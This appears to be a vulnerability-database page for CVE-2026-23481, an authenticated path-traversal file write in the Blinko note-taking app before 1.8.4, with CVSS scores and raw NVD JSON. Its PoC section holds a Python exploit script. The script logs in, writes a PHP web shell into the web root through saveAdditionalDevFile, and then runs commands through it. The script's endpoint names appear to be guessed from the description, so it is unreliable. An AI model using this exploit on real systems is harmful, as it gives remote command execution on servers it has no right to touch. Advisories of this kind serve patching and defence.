Security Vulnerability Report
中文
CVE-2026-23481 CVSS 6.5 MEDIUM

CVE-2026-23481

Published: 2026-03-23 21:17:02
Last Modified: 2026-03-24 18:50:04
Source: [email protected]

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an authenticated arbitrary file write vulnerability in saveAdditionalDevFile. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE
Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Blinko Authenticated Arbitrary File Write # Date: 2026-03-23 # Exploit Author: Analyst # Vendor Homepage: https://github.com/blinkospace/blinko # Version: < 1.8.4 TARGET_URL = "http://target-ip" USERNAME = "attacker" PASSWORD = "password" session = requests.Session() # Step 1: Login to obtain authenticated session login_payload = { "username": USERNAME, "password": PASSWORD } login_resp = session.post(f"{TARGET_URL}/api/login", json=login_payload) if login_resp.status_code != 200: print("Login failed") exit() # Step 2: Trigger arbitrary file write via saveAdditionalDevFile # The endpoint allows specifying path and content exploit_payload = { "path": "../../var/www/html/shell.php", # Example path traversal "content": "<?php system($_GET['cmd']); ?>" } exploit_resp = session.post(f"{TARGET_URL}/api/saveAdditionalDevFile", json=exploit_payload) if exploit_resp.status_code == 200: print("[+] File written successfully!") print(f"[+] Check your webshell at: {TARGET_URL}/shell.php?cmd=whoami") else: print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23481", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:02.100", "lastModified": "2026-03-24T18:50:03.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an authenticated arbitrary file write vulnerability in saveAdditionalDevFile. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, existe una vulnerabilidad de escritura arbitraria de archivos autenticada en saveAdditionalDevFile. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/02a4205f1ad22d0e78dc2ab2967b551d0dbd0a06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-38hg-8p2j-76g5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.